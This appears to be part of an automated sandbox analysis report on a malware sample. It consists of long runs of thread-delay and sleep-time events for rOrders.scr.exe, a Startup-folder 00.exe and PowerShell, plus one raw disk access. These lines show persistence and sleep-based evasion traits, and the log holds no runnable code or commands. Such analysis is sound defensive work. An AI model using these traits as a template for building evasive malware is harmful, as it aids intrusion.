Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598192	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597512	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 595047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 594500	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1680	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Window / User API: threadDelayed 2664	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Window / User API: threadDelayed 7183	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5558	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Window / User API: threadDelayed 7378	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Window / User API: threadDelayed 2451	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep count: 1680 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5808	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6552	Thread sleep count: 191 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2284	Thread sleep count: 2664 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -599887s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2284	Thread sleep count: 7183 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -598546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -597655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -596672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -596562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -596344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -596014s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -595905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -595159s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -594976s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -594422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe TID: 2072	Thread sleep time: -594312s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5592	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2704	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416	Thread sleep count: 5558 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 528	Thread sleep count: 676 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7436	Thread sleep count: 7378 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7436	Thread sleep count: 2451 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -599750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -599641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -599531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -599312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -598750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -598192s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -597734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -597625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -597512s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -597391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -597281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -597172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -595266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -595047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe TID: 7432	Thread sleep time: -594500s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599887	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597655	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596672	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596562	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596344	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 596014	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595905	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 595159	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594976	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Users\user\Desktop\rOrders.scr.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599750	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Thread delayed: delay time: 599312	Jump to behavior
